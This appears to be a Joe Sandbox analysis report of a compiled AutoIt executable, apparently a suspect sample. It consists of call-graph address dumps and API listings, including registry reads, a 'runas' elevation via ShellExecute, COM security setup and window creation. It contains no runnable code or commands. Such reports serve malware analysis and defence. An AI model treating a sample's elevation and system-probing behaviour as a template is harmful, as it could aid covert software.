moneypunct 88026->88728 88029 429d42 88027->88029 88724 44a801 52 API calls 88027->88724 88041 40e0a0 52 API calls 88029->88041 88048 40e1c0 VariantClear 88030->88048 88030->88074 88031 429a46 VariantClear 88031->88059 88033 40a045 88039 4115d7 52 API calls 88033->88039 88034 42a3f5 88731 47390f VariantClear 88034->88731 88035 408f40 VariantClear 88035->88059 88043 4115d7 52 API calls 88037->88043 88044 40a04c 88039->88044 88045 429d57 88041->88045 88043->88063 88049 40a0a7 88044->88049 88053 4091e0 316 API calls 88044->88053 88725 453443 52 API calls 88045->88725 88046 40ba10 52 API calls 88046->88059 88047 42a42f 88732 45e737 90 API calls 3 library calls 88047->88732 88048->88074 88073 40a0af 88049->88073 88733 40c790 VariantClear moneypunct 88049->88733 88050 4299d9 88054 408f40 VariantClear 88050->88054 88744 45e737 90 API calls 3 library calls 88051->88744 88053->88049 88058 4299e2 88054->88058 88055 429abd 88055->86960 88056 429d88 88726 453443 52 API calls 88056->88726 88067 410c60 VariantClear 88058->88067 88059->88017 88059->88018 88059->88019 88059->88023 88059->88031 88059->88035 88059->88037 88059->88046 88059->88050 88059->88051 88059->88055 88065 40a780 199 API calls 88059->88065 88066 42a452 88059->88066 88722 40c4e0 199 API calls 88059->88722 88723 40e270 VariantClear moneypunct 88059->88723 88063->88004 88065->88059 88066->88013 88068 40a650 moneypunct 88067->88068 88068->86960 88069 408f40 VariantClear 88101 40a162 moneypunct _memmove 88069->88101 88070 4115d7 52 API calls 88070->88074 88071 41130a 51 API calls __cinit 88071->88074 88072 402780 52 API calls 88072->88074 88075 42a4b4 VariantClear 88073->88075 88077 40a11b 88073->88077 88073->88101 88074->88034 88074->88047 88074->88063 88074->88070 88074->88071 88074->88072 88076 40a780 199 API calls 88074->88076 88078 401980 53 API calls 88074->88078 88079 408e80 VariantClear 88074->88079 88085 44a801 52 API calls 88074->88085 88089 409fd2 88074->88089 88092 409c95 88074->88092 88729 45f508 52 API calls 88074->88729 88730 403e10 53 API calls 88074->88730 88084 40a12d moneypunct 88075->88084 88076->88074 88077->88084 88734 40e270 VariantClear moneypunct 88077->88734 88078->88074 88079->88074 88081 4115d7 52 API calls 88081->88101 88082 408e80 VariantClear 88082->88101 88084->88081 88084->88101 88085->88074 88086 42a74d VariantClear 88086->88101 88087 40a368 88088 42aad4 88087->88088 88096 40a397 88087->88096 88737 46fe90 VariantClear VariantClear moneypunct 88088->88737 88089->88033 88089->88034 88090 42a886 VariantClear 88090->88101 88091 42a7e4 VariantClear 88091->88101 88092->86960 88093 40a3ce 88105 40a3d9 moneypunct 88093->88105 88738 40b400 VariantClear VariantClear moneypunct 88093->88738 88095 40e270 VariantClear 88095->88101 88096->88093 88121 40a42c moneypunct 88096->88121 88720 40b400 VariantClear VariantClear moneypunct 88096->88720 88099 42abaf 88103 42abd4 VariantClear 88099->88103 88112 40a4ee moneypunct 88099->88112 88100 4115d7 52 API calls 88104 42a5a6 VariantInit VariantCopy 88100->88104 88101->88069 88101->88082 88101->88086 88101->88087 88101->88088 88101->88090 88101->88091 88101->88095 88101->88100 88108 4115d7 52 API calls 88101->88108 88735 470870 52 API calls 88101->88735 88736 44ccf1 VariantClear moneypunct 88101->88736 88102 40a4dc 88102->88112 88740 40e270 VariantClear moneypunct 88102->88740 88103->88112 88104->88101 88107 42a5c6 VariantClear 88104->88107 88106 40a41a 88105->88106 88114 42ab44 VariantClear 88105->88114 88105->88121 88106->88121 88739 40e270 VariantClear moneypunct 88106->88739 88107->88101 88108->88101 88109 42ac4f 88115 42ac79 VariantClear 88109->88115 88119 40a546 moneypunct 88109->88119 88112->88109 88113 40a534 88112->88113 88113->88119 88741 40e270 VariantClear moneypunct 88113->88741 88114->88121 88115->88119 88116 42ad28 88122 42ad4e VariantClear 88116->88122 88126 40a583 moneypunct 88116->88126 88119->88116 88120 40a571 88119->88120 88120->88126 88742 40e270 VariantClear moneypunct 88120->88742 88121->88099 88121->88102 88122->88126 88124 42ae0e VariantClear 88124->88126 88126->88068 88126->88124 88743 40e270 VariantClear moneypunct 88126->88743 88127->86960 88128->86910 88129->86915 88130->86960 88131->86960 88132->86960 88133->86960 88134->86967 88135->86967 88136->86967 88137->86967 88138->86967 88139->86967 88140->86967 88142 403cdf 88141->88142 88143 408f40 VariantClear 88142->88143 88144 403ce7 88143->88144 88144->86954 88145->86967 88146->86967 88147->86960 88148->86907 88150 408e94 88149->88150 88151 408e88 88149->88151 88153 45340c 88150->88153 88152 408f40 VariantClear 88151->88152 88152->88150 88154 453439 88153->88154 88155 453419 88153->88155 88154->87873 88156 45342f 88155->88156 88219 4531b1 85 API calls 5 library calls 88155->88219 88156->87873 88158 453425 88158->87873 88159->87879 88160->87881 88161->87864 88163 410c73 moneypunct 88162->88163 88164 428372 88162->88164 88163->87872 88166 42838c 88164->88166 88220 40e1c0 88164->88220 88168 40ba49 88167->88168 88171 40ba1b moneypunct _memmove 88167->88171 88170 4115d7 52 API calls 88168->88170 88169 4115d7 52 API calls 88172 40ba22 88169->88172 88170->88171 88171->88169 88172->87888 88173->87891 88174->87910 88175->87911 88177 40a7a6 88176->88177 88178 40ae8c 88176->88178 88219->88158 88221 408f40 VariantClear 88220->88221 88222 40e1cb moneypunct 88221->88222 88222->88164 88232->87918 88233->87923 88234->87937 88235->87939 88236->87926 88238 408e80 VariantClear 88237->88238 88245 47fb02 88238->88245 88241 47fc59 88243 40a780 199 API calls 88241->88243 88247 47fc6a 88243->88247 88244 47fc2b 88246 408f40 VariantClear 88244->88246 88245->88241 88245->88244 88251 408f40 VariantClear 88245->88251 88261 47fcd4 88245->88261 88265 408e80 VariantClear 88245->88265 88277 47fc1d 88245->88277 88294 475a67 88245->88294 88322 47b291 88245->88322 88333 46fe32 VariantClear 88245->88333 88248 47fc33 88246->88248 88247->88244 88249 47fc7d 88247->88249 88250 47fc8c 88247->88250 88252 408f40 VariantClear 88248->88252 88335 45e737 90 API calls 3 library calls 88249->88335 88254 40ba10 52 API calls 88250->88254 88251->88245 88255 47fc3b 88252->88255 88256 47fc98 88254->88256 88257 408f40 VariantClear 88255->88257 88336 47b2f4 144 API calls 88256->88336 88259 47fc43 88257->88259 88262 410c60 VariantClear 88259->88262 88260 47fca7 88264 408f40 VariantClear 88260->88264 88263 408f40 VariantClear 88261->88263 88266 47fc4b 88262->88266 88267 47fcdc 88263->88267 88268 47fcb1 88264->88268 88265->88245 88266->87959 88269 408f40 VariantClear 88267->88269 88270 408f40 VariantClear 88268->88270 88271 47fce4 88269->88271 88272 47fcb9 88270->88272 88273 408f40 VariantClear 88271->88273 88274 408f40 VariantClear 88272->88274 88275 47fcec 88273->88275 88276 47fcc1 88274->88276 88278 410c60 VariantClear 88275->88278 88279 410c60 VariantClear 88276->88279 88334 45e538 90 API calls 3 library calls 88277->88334 88281 47fcf4 88278->88281 88282 47fcc9 88279->88282 88281->87959 88282->87959 88283->87952 88284->87972 88285->87952 88286->87974 88287->87952 88288->87974 88289->87956 88290->87974 88291->87974 88292->87974 88293->87954 88297 475ac5 88294->88297 88301 475ae5 88294->88301 88296 475afe 88298 408f40 VariantClear 88296->88298 88299 475b42 88297->88299 88300 402780 52 API calls 88297->88300 88297->88301 88304 475b06 88298->88304 88302 402780 52 API calls 88299->88302 88300->88297 88337 45e737 90 API calls 3 library calls 88301->88337 88313 475b60 88302->88313 88303 475c7c 88305 408f40 VariantClear 88303->88305 88304->88245 88308 475c84 88305->88308 88306 40c2c0 52 API calls 88306->88313 88307 40a780 199 API calls 88307->88313 88308->88245 88309 475cc7 88310 408f40 VariantClear 88309->88310 88315 475ca8 88310->88315 88311 40ba10 52 API calls 88311->88313 88312 475cd5 88339 45e737 90 API calls 3 library calls 88312->88339 88313->88303 88313->88306 88313->88307 88313->88309 88313->88311 88313->88312 88314 408f40 VariantClear 88313->88314 88319 475ca0 88313->88319 88338 40c4e0 199 API calls 88313->88338 88314->88313 88315->88245 88318 475ce8 88320 408f40 VariantClear 88318->88320 88321 408f40 VariantClear 88319->88321 88320->88315 88321->88315 88323 47b2e7 88322->88323 88324 47b2a5 88322->88324 88323->88245 88340 40e710 88324->88340 88327 47b2b7 88351 47974b 88327->88351 88328 47b2cf 88330 47974b 144 API calls 88328->88330 88332 47b2df 88330->88332 88331 47b2c7 88331->88245 88332->88245 88333->88245 88334->88244 88335->88244 88336->88260 88337->88296 88338->88313 88339->88318 88341 408f40 VariantClear 88340->88341 88342 40e71b 88341->88342 88343 4115d7 52 API calls 88342->88343 88344 40e729 88343->88344 88345 40e734 88344->88345 88346 426bdc 88344->88346 88347 426be7 88345->88347 88348 401b10 52 API calls 88345->88348 88346->88347 88349 40bc70 52 API calls 88346->88349 88350 40e743 88348->88350 88349->88347 88350->88327 88350->88328 88352 479786 88351->88352 88353 479aed 88351->88353 88352->88353 88355 479798 88352->88355 88420 451b42 61 API calls 88353->88420 88357 4797a2 88355->88357 88358 4797be 88355->88358 88356 479b00 88356->88331 88413 451b42 61 API calls 88357->88413 88360 4797c7 88358->88360 88361 4797e3 88358->88361 88414 451b42 61 API calls 88360->88414 88391 441eba 88361->88391 88362 4797b5 88362->88331 88365 4797da 88365->88331 88366 4797f7 88367 479815 88366->88367 88368 4797fe 88366->88368 88372 47983c 88367->88372 88396 451d2b 88367->88396 88415 451b42 61 API calls 88368->88415 88370 47980c 88370->88331 88376 4798e6 88372->88376 88407 479714 88372->88407 88373 47994b VariantInit 88376->88373 88377 479916 VariantClear 88376->88377 88377->88376 88392 441f12 88391->88392 88393 441ecc _wcslen 88391->88393 88392->88366 88393->88392 88394 410160 52 API calls 88393->88394 88395 441ede 88394->88395 88395->88366 88398 451d5e 88396->88398 88397 451d68 88397->88372 88398->88397 88399 451e93 SysFreeString 88398->88399 88400 451f21 88398->88400 88401 451ea0 88398->88401 88399->88401 88400->88401 88402 451f6d lstrcmpiW 88400->88402 88403 451f7f SysFreeString 88400->88403 88406 451fab 88400->88406 88401->88397 88421 44a545 RaiseException 88401->88421 88402->88403 88403->88400 88406->88372 88408 479728 88407->88408 88413->88362 88414->88365 88415->88370 88420->88356 88421->88401 88481 4289d2 88480->88481 88482 408db3 88480->88482 88510 45e737 90 API calls 3 library calls 88481->88510 88506 40bec0 88482->88506 88485 408dc9 88486 4289e5 88485->88486 88488 428a05 88485->88488 88489 40ba10 52 API calls 88485->88489 88491 40a780 199 API calls 88485->88491 88492 408e64 88485->88492 88494 408f40 VariantClear 88485->88494 88495 408e5a 88485->88495 88511 45e737 90 API calls 3 library calls 88486->88511 88490 408f40 VariantClear 88488->88490 88489->88485 88490->88495 88491->88485 88493 408f40 VariantClear 88492->88493 88493->88495 88494->88485 88495->87980 88497 408f40 VariantClear 88496->88497 88498 403d20 88497->88498 88499 403cd0 VariantClear 88498->88499 88500 403d4d 88499->88500 88513 477145 88500->88513 88518 4755ad 88500->88518 88521 46f8cb 88500->88521 88501 403d76 88501->87977 88501->87988 88505->87977 88507 40bed0 88506->88507 88508 40bef2 88507->88508 88512 45e737 90 API calls 3 library calls 88507->88512 88508->88485 88510->88486 88511->88488 88512->88508 88514 408e80 VariantClear 88513->88514 88515 47715a 88514->88515 88540 467ac4 88515->88540 88517 477160 88517->88501 88563 475077 88518->88563 88520 4755c0 88520->88501 88522 46f8e7 88521->88522 88523 46f978 88521->88523 88524 46f900 88522->88524 88525 46f93c 88522->88525 88526 46f91a 88522->88526 88536 46f8ee 88522->88536 88523->88501 88528 45340c 85 API calls 88524->88528 88527 45340c 85 API calls 88525->88527 88529 45340c 85 API calls 88526->88529 88531 46f958 88527->88531 88528->88536 88530 46f931 88529->88530 88533 45340c 85 API calls 88530->88533 88534 45340c 85 API calls 88531->88534 88532 45340c 85 API calls 88535 46f971 88532->88535 88533->88536 88537 46f95f 88534->88537 88669 46cb5f 88535->88669 88536->88532 88539 45340c 85 API calls 88537->88539 88539->88536 88541 467adc 88540->88541 88550 467bb8 88540->88550 88542 467c1d 88541->88542 88543 467c16 88541->88543 88544 467b90 88541->88544 88553 467aed 88541->88553 88546 4115d7 52 API calls 88542->88546 88562 40e270 VariantClear moneypunct 88543->88562 88547 4115d7 52 API calls 88544->88547 88559 467b75 _memmove 88546->88559 88547->88559 88548 4115d7 52 API calls 88548->88550 88549 467b55 88551 4115d7 52 API calls 88549->88551 88550->88517 88552 467b5b 88551->88552 88560 442ee0 52 API calls 88552->88560 88555 4115d7 52 API calls 88553->88555 88558 467b28 moneypunct 88553->88558 88555->88558 88556 467b6b 88561 45f645 54 API calls moneypunct 88556->88561 88558->88542 88558->88549 88558->88559 88559->88548 88560->88556 88561->88559 88562->88542 88616 4533eb 88563->88616 88566 4750ee 88568 408f40 VariantClear 88566->88568 88567 475129 88620 4646e0 88567->88620 88575 4750f5 88568->88575 88570 47515e 88571 475162 88570->88571 88581 47518e 88570->88581 88575->88520 88583 4533eb 85 API calls 88581->88583 88592 475480 88581->88592 88600 475357 88581->88600 88601 4754b5 88581->88601 88652 436299 52 API calls 2 library calls 88581->88652 88653 463ad5 64 API calls __wcsicoll 88581->88653 88583->88581 88617 453404 88616->88617 88618 4533f8 88616->88618 88617->88566 88617->88567 88618->88617 88663 4531b1 85 API calls 5 library calls 88618->88663 88664 4536f7 53 API calls 88620->88664 88622 4646fc 88665 4426cd 59 API calls _wcslen 88622->88665 88624 464711 88626 40bc70 52 API calls 88624->88626 88632 46474b 88624->88632 88627 46472c 88626->88627 88666 461465 52 API calls _memmove 88627->88666 88629 464741 88631 464793 88631->88570 88632->88631 88667 463ad5 64 API calls __wcsicoll 88632->88667 88652->88581 88653->88581 88663->88617 88664->88622 88665->88624 88666->88629 88667->88631 88670 40bc70 52 API calls 88669->88670 88671 46cb7e 88670->88671 88672 40bc70 52 API calls 88671->88672 88673 46cb86 88672->88673 88674 40bc70 52 API calls 88673->88674 88675 46cb91 88674->88675 88676 408f40 VariantClear 88675->88676 88677 46cbaf 88676->88677 88678 46cbd4 CLSIDFromProgID 88677->88678 88679 46cbc5 OleInitialize 88677->88679 88679->88678 88719->87998 88720->88093 88721->88011 88722->88059 88723->88059 88724->88029 88725->88056 88726->88022 88727->88026 88728->88030 88729->88074 88730->88074 88731->88047 88732->88066 88733->88049 88734->88084 88735->88101 88736->88101 88737->88093 88738->88105 88739->88121 88740->88112 88741->88119 88742->88126 88743->88126 88744->88066 88745 42d154 88749 480a8d 88745->88749 88747 42d161 88748 480a8d 199 API calls 88747->88748 88748->88747 88750 480ae4 88749->88750 88751 480b26 88749->88751 88752 480aeb 88750->88752 88753 480b15 88750->88753 88754 40bc70 52 API calls 88751->88754 88755 480aee 88752->88755 88756 480b04 88752->88756 88782 4805bf 199 API calls 88753->88782 88771 480b2e 88754->88771 88755->88751 88758 480af3 88755->88758 88781 47fea2 199 API calls __itow_s 88756->88781 88780 47f135 199 API calls 88758->88780 88760 40e0a0 52 API calls 88760->88771 88763 408f40 VariantClear 88765 481156 88763->88765 88764 480aff 88764->88763 88766 408f40 VariantClear 88765->88766 88767 48115e 88766->88767 88767->88747 88768 401980 53 API calls 88768->88771 88770 40c2c0 52 API calls 88770->88771 88771->88760 88771->88764 88771->88768 88771->88770 88772 40e710 53 API calls 88771->88772 88773 40a780 199 API calls 88771->88773 88775 408e80 VariantClear 88771->88775 88776 480ff5 88771->88776 88783 45377f 52 API calls 88771->88783 88784 45e951 53 API calls 88771->88784 88785 40e830 53 API calls 88771->88785 88786 47925f 53 API calls 88771->88786 88787 47fcff 199 API calls 88771->88787 88772->88771 88773->88771 88775->88771 88788 45e737 90 API calls 3 library calls 88776->88788 88780->88764 88781->88764 88782->88764 88783->88771 88784->88771 88785->88771 88786->88771 88787->88771 88788->88764 88789 42b14b 88796 40bc10 88789->88796 88791 42b159 88792 4096a0 330 API calls 88791->88792 88793 42b177 88792->88793 88807 44b92d VariantClear 88793->88807 88795 42bc5b 88797 40bc24 88796->88797 88798 40bc17 88796->88798 88800 40bc2a 88797->88800 88801 40bc3c 88797->88801 88799 408e80 VariantClear 88798->88799 88802 40bc1f 88799->88802 88803 408e80 VariantClear 88800->88803 88804 4115d7 52 API calls 88801->88804 88802->88791 88805 40bc33 88803->88805 88806 40bc43 88804->88806 88805->88791 88806->88791 88807->88795 88808 425b2b 88813 40f000 88808->88813 88812 425b3a 88814 4115d7 52 API calls 88813->88814 88815 40f007 88814->88815 88816 4276ea 88815->88816 88822 40f030 88815->88822 88821 41130a 51 API calls __cinit 88821->88812 88823 40f039 88822->88823 88825 40f01a 88822->88825 88852 41130a 51 API calls __cinit 88823->88852 88826 40e500 88825->88826 88827 40bc70 52 API calls 88826->88827 88828 40e515 GetVersionExW 88827->88828 88829 402160 52 API calls 88828->88829 88830 40e557 88829->88830 88853 40e660 88830->88853 88836 427674 88840 4276c6 GetSystemInfo 88836->88840 88838 40e5e0 88842 4276d5 GetSystemInfo 88838->88842 88867 40efd0 88838->88867 88839 40e5cd GetCurrentProcess 88874 40ef20 LoadLibraryA GetProcAddress 88839->88874 88840->88842 88845 40e629 88871 40ef90 88845->88871 88848 40e641 FreeLibrary 88849 40e644 88848->88849 88850 40e653 FreeLibrary 88849->88850 88851 40e656 88849->88851 88850->88851 88851->88821 88852->88825 88854 40e667 88853->88854 88855 42761d 88854->88855 88856 40c600 52 API calls 88854->88856 88857 40e55c 88856->88857 88858 40e680 88857->88858 88859 40e687 88858->88859 88860 427616 88859->88860 88861 40c600 52 API calls 88859->88861 88862 40e566 88861->88862 88862->88836 88863 40ef60 88862->88863 88864 40e5c8 88863->88864 88865 40ef66 LoadLibraryA 88863->88865 88864->88838 88864->88839 88865->88864 88866 40ef77 GetProcAddress 88865->88866 88866->88864 88868 40e620 88867->88868 88869 40efd6 LoadLibraryA 88867->88869 88868->88840 88868->88845 88869->88868 88870 40efe7 GetProcAddress 88869->88870 88870->88868 88875 40efb0 LoadLibraryA GetProcAddress 88871->88875 88873 40e632 GetNativeSystemInfo 88873->88848 88873->88849 88874->88838 88875->88873 88876 425b5e 88881 40c7f0 88876->88881 88880 425b6d 88916 40db10 52 API calls 88881->88916 88883 40c82a 88917 410ab0 6 API calls 88883->88917 88885 40c86d 88886 40bc70 52 API calls 88885->88886 88887 40c877 88886->88887 88888 40bc70 52 API calls 88887->88888 88889 40c881 88888->88889 88890 40bc70 52 API calls 88889->88890 88891 40c88b 88890->88891 88892 40bc70 52 API calls 88891->88892 88893 40c8d1 88892->88893 88894 40bc70 52 API calls 88893->88894 88895 40c991 88894->88895 88918 40d2c0 52 API calls 88895->88918 88897 40c99b 88919 40d0d0 53 API calls 88897->88919 88899 40c9c1 88900 40bc70 52 API calls 88899->88900 88901 40c9cb 88900->88901 88920 40e310 53 API calls 88901->88920 88903 40ca28 88904 408f40 VariantClear 88903->88904 88905 40ca30 88904->88905 88906 408f40 VariantClear 88905->88906 88907 40ca38 GetStdHandle 88906->88907 88908 429630 88907->88908 88909 40ca87 88907->88909 88908->88909 88910 429639 88908->88910 88915 41130a 51 API calls __cinit 88909->88915 88921 4432c0 57 API calls 88910->88921 88912 429641 88922 44b6ab CreateThread 88912->88922 88914 42964f CloseHandle 88914->88909 88915->88880 88916->88883 88917->88885 88918->88897 88919->88899 88920->88903 88921->88912 88922->88914 88923 44b5cb 58 API calls 88922->88923 88924 425b6f 88929 40dc90 88924->88929 88928 425b7e 88930 40bc70 52 API calls 88929->88930 88931 40dd03 88930->88931 88937 40f210 88931->88937 88934 40dd96 88935 40ddb7 88934->88935 88940 40dc00 52 API calls 2 library calls 88934->88940 88936 41130a 51 API calls __cinit 88935->88936 88936->88928 88941 40f250 RegOpenKeyExW 88937->88941 88939 40f230 88939->88934 88940->88934 88942 425e17 88941->88942 88943 40f275 RegQueryValueExW 88941->88943 88942->88939 88944 40f2c3 RegCloseKey 88943->88944 88945 40f298 88943->88945 88944->88939 88946 40f2a9 RegCloseKey 88945->88946 88947 425e1d 88945->88947 88946->88939
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 004096C1
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • _memmove.LIBCMT ref: 0040970C
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                  • _memmove.LIBCMT ref: 00409D96
                                                                                  • _memmove.LIBCMT ref: 0040A6C4
                                                                                  • _memmove.LIBCMT ref: 004297E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2383988440-0
                                                                                  • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                  • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                  Strings
                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                  • API String ID: 2495805114-3383388033
                                                                                  • Opcode ID: 72fb05aec3bb303782bad09735a5a24f9beaa233d9fb702dad6034791cb84eb1
                                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                  • Opcode Fuzzy Hash: 72fb05aec3bb303782bad09735a5a24f9beaa233d9fb702dad6034791cb84eb1
                                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1529 46cca6-46ccba call 458651 1526->1529 1530 46cc49-46cc60 CoCreateInstance 1526->1530 1527->1526 1528 46cbfb-46cc05 1527->1528 1531 46cc06-46cc30 call 451b42 call 402250 * 3 1528->1531 1533 46cc96-46cca1 1529->1533 1540 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1529->1540 1530->1533 1534 46cc62-46cc8b call 43119b 1530->1534 1533->1531 1548 46cc8e-46cc90 1534->1548 1553 46cdf4 1540->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1540->1554 1548->1533 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1548->1551 1557 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1557 1567 46cd35-46cd41 call 465177 1554->1567 1568 46cd21-46cd33 1554->1568 1557->1533 1566 46ce50-46ce55 1557->1566 1566->1533 1570 46ce5b-46ce62 1566->1570 1579 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1567->1579 1571 46cda5-46cdaa 1568->1571 1574 46ce64-46ce8b CoSetProxyBlanket 1570->1574 1575 46ce8d-46ce9e 1570->1575 1577 46cdac-46cdbb call 4111c1 1571->1577 1578 46cdbd-46cdc0 1571->1578 1574->1575 1575->1548 1576 46cea4-46ceb2 1575->1576 1576->1531 1582 46cdc3-46cdf2 1577->1582 1578->1582 1579->1571 1582->1557
                                                                                  APIs
                                                                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                  • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                  • _wcslen.LIBCMT ref: 0046CDB0
